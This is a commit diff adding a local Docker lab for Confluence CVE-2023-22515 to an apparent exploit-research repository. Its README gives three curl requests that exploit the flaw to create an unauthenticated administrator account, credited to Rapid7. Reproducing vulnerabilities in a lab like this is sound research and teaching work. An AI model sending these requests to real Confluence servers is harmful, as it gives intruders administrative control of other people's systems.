Add reproduction instructions for Confluence CVE-2023-22515

README.md

@@ -20,6 +20,7 @@ This repository aims at providing proof of concept exploits, malware samples and
 - [Confluence CVE-2022-26134 OGNL Vulnerability](./proof-of-concept-exploits/confluence-cve-2022-26134)
 - [OpenSSL punycode Vulnerability (CVE-2022-3602)](./proof-of-concept-exploits/openssl-punycode-vulnerability)
 - [OverlayFS privilege escalation vulnerability CVE-2023-0386](./proof-of-concept-exploits/overlayfs-cve-2023-0386/)
+- [Confluence CVE-2023-22515 vulnerability](./proof-of-concept-exploits/confluence-cve-2023-22515/)
 
 ## Stay Tuned!
 

proof-of-concept-exploits/confluence-cve-2023-22515/README.md

@@ -0,0 +1,39 @@
+# Confluence CVE-2023-22515 OGNL vulnerability
+
+This vulnerability affects Confluence Server and Confluence Data Center. It allows an unauthenticated attacker to create an administrator Confluence user.
+
+Credits for the proof-of-concept fully go to Rapid7: https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
+
+
+## Running the application
+
+Run it:
+
+```
+docker-compose up
+```
+
+It takes a few minutes to start up. When you see the line `Server startup in [xx] milliseconds` in the logs:
+
+1. Browse to http://localhost:8090
+2. Get a trial license (this won't work without one)
+3. It'll take a while to configure, make sure you have 3-4 GB of RAM
+4. Start with an "Empty Site"
+5. Click on "Manager users and groups in Confluence"
+6. Set a sample administrator username and password
+
+## Exploitation steps
+
+Taken from https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis
+
+```
+curl -vk "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
+
+curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=malicious-user&fullName=malicious&email=malicious%40localhost&password=malicious&confirm=malicious&setup-next-button=Next" http://localhost:8090/setup/setupadministrator.action
+
+curl -vk -X POST -H "X-Atlassian-Token: no-check" http://localhost:8090/setup/finishsetup.action
+```
+
+After that, browse to the [list of users](http://localhost:8090/admin/users/showallusers.action?reset=true) and you'll notice that a new, malicious user has been created:
+
+![](./screenshot.png)

proof-of-concept-exploits/confluence-cve-2023-22515/docker-compose.yml

@@ -0,0 +1,24 @@
+version: "3.9"
+services:
+  conf:
+    image: atlassian/confluence-server@sha256:048c6b8662e0d6a7a27a07357988fa0bf8ba79f13a7c82d8c05f5eca4d2de311
+    container_name: vulnerable-confluence
+    depends_on:
+      - db
+    ports:
+       - 8090:8090
+       - 8091:8091
+    environment:
+      ATL_JDBC_URL: jdbc:postgresql://db:5432/conf
+      ATL_JDBC_USER: postgres
+      ATL_JDBC_PASSWORD: koko
+      ATL_DB_TYPE: postgresql
+      ATL_DB_DRIVER: org.postgresql.Driver
+      ATL_DB_SCHEMA_NAME: conf
+  # port = 5432, username = postgres
+  db:
+    image: postgres
+    restart: always
+    environment:
+      POSTGRES_PASSWORD: koko
+      POSTGRES_DB: conf